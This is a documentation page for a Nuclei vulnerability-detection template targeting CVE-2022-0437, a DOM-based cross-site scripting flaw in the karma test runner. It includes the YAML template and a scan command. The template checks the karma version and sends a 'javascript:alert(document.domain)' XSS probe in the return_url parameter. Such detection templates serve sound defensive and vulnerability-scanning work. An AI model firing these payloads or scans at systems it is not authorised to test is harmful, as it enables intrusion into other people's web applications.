Skip to content
Nuclei Templates

karma-runner DOM-based Cross-Site Scripting

ID: CVE-2022-0437

Severity: medium

Author: pikpikcu

Tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js

Description

Section titled “Description”

NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0437


info:
  name: karma-runner DOM-based Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability.
  reference:
    - https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885
    - https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0437
    - https://github.com/karma-runner/karma
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0437
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.40882
    cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 2
    vendor: karma_project
    product: karma
    framework: node.js
  tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js


http:
  - method: GET
    path:
      - '{{BaseURL}}/karma.js'
      - '{{BaseURL}}/?return_url=javascript:alert(document.domain)'


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - compare_versions(version, '< 6.3.14')


      - type: word
        part: body_2
        words:
          - 'Karma'


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "(?m)VERSION: '([0-9.]+)'"
        internal: true
# digest: 4b0a00483046022100e65378b1802c825a5f99686f12653eaefcf8e5271fe658caebd935241dcfed68022100bb6f3c6caeea898ee676d446701036b58c2bf2101a7d25771680bfde26685fa8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0437.yaml"

View on Github